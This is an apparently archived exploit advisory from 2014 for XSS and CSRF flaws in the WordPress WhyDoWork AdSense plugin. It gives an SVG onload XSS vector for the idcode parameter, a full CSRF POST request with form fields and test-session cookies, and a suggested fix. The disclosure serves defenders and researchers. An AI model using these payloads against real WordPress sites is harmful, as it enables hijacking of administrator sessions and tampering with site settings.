WordPress WhyDoWork AdSense 1.2 XSS / CSRF

WordPress WhyDoWork AdSense 1.2 XSS / CSRF: Posted Jul 29, 2014; Authored by Dylan Irzi; WordPress WhyDoWork AdSense plugin version 1.2 suffers from cross site request forgery and cross site scripting vulnerabilities.; tags | exploit, vulnerability, xss, csrf; SHA-256 | af9bca3fe65b0a9bbf0292a7c524d2bc3961c3d5ba4dc081c13b25eb55493d3d; Download | Favorite | View

WordPress WhyDoWork AdSense 1.2 XSS / CSRF

###########################################################################################
# Exploit Title: WhyDoWork AdSense Plugin 1.2 - XSS and CSRF
# Date: 28 de Julio del 2014
# Exploit Author: Dylan Irzi
# Credit goes for: websecuritydev.com
# Vendor Homepage: https://wordpress.org/plugins/whydowork-adsense/
# Tested on: Win7 & Linux Mint
# Affected Version : 2.0.2 & Anteriores.
# Contacts: { https://twitter.com/Dylan_irzi11 , http://websecuritydev.com/}

Affected items - Archivos Afectados.

http://localhost/wordpress/wp-admin/options-general.php?page=whydowork_adsense&idcode=1[XSS
CODE]

Prueba de Concepto PoC:
Vector: "><svg/onload=alert(/Dylan/)>

Variable Afectada: $idx
Fix: wp_specialchars($idx);

Linea: 118,127,143,147

CSRF Vulnerability:
POST URL:
http://localhost/wordpress/wp-admin/options-general.php?page=whydowork_adsense&idcode=1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101
Firefox/31.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-co
Accept-Encoding: gzip, deflate
Referer:
http://localhost/wordpress/wp-admin/options-general.php?page=whydowork_adsense&idcode=1
Cookie:
wordpress_bbfa5b726c6b7a9cf3cda9370be3ee91=hacking%7C1406766762%7C0a0ccdb16a9d99c2b9113e25e2ea6b8d;
wp-settings-time-1=1406489836;
wp-settings-1=editor%3Dtinymce%26libraryContent%3Dbrowse;
wordpress_test_cookie=WP+Cookie+check;
wordpress_logged_in_bbfa5b726c6b7a9cf3cda9370be3ee91=loreleitaron%7C1406766762%7C667e59a36d4254c8a178580770ac5135
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 843

CONTENIDO POST:
idx=1&whydowork_code=tets&whydowork_exclude=&whydowork_front_code_1=FALSE&whydowork_front_pos_1=top&whydowork_front_post_1=1&whydowork_front_code_2=FALSE&whydowork_front_pos_2=top&whydowork_front_post_2=1&whydowork_front_code_3=FALSE&whydowork_front_pos_3=top&whydowork_front_post_3=1&whydowork_page_code_1=FALSE&whydowork_page_pos_1=top&whydowork_page_code_2=FALSE&whydowork_page_pos_2=top&whydowork_page_code_3=FALSE&whydowork_page_pos_3=top&whydowork_single_code_1=FALSE&whydowork_single_pos_1=top&whydowork_single_code_2=FALSE&whydowork_single_pos_2=top&whydowork_single_code_3=FALSE&whydowork_single_pos_3=top&whydowork_singleold_code_1=FALSE&whydowork_singleold_pos_1=top&whydowork_singleold_code_2=FALSE&whydowork_singleold_pos_2=top&whydowork_singleold_code_3=FALSE&whydowork_singleold_pos_3=top&whydowork_adsense_oldday=&Submit=Update

###########################################################################################

Top Authors In Last 30 Days

Red Hat 269 files
Ubuntu 99 files
Gentoo 29 files
indoushka 19 files
Debian 17 files
Sina Kheirkhah 7 files
tmrswrr 7 files
Rodolfo Tavares 4 files
jheysel-r7 2 files
Pierre Kim 2 files

File Archives

Systems

AIX (429)
Apple (2,090)
BSD (377)
CentOS (58)
Cisco (1,927)
Debian (7,082)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,534)
HPUX (880)
iOS (376)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,505)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,383)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,686)
UNIX (9,430)
UnixWare (187)
Windows (6,667)
Other

WordPress WhyDoWork AdSense 1.2 XSS / CSRF

WordPress WhyDoWork AdSense 1.2 XSS / CSRF

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

WordPress WhyDoWork AdSense 1.2 XSS / CSRF

Share This

WordPress WhyDoWork AdSense 1.2 XSS / CSRF

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems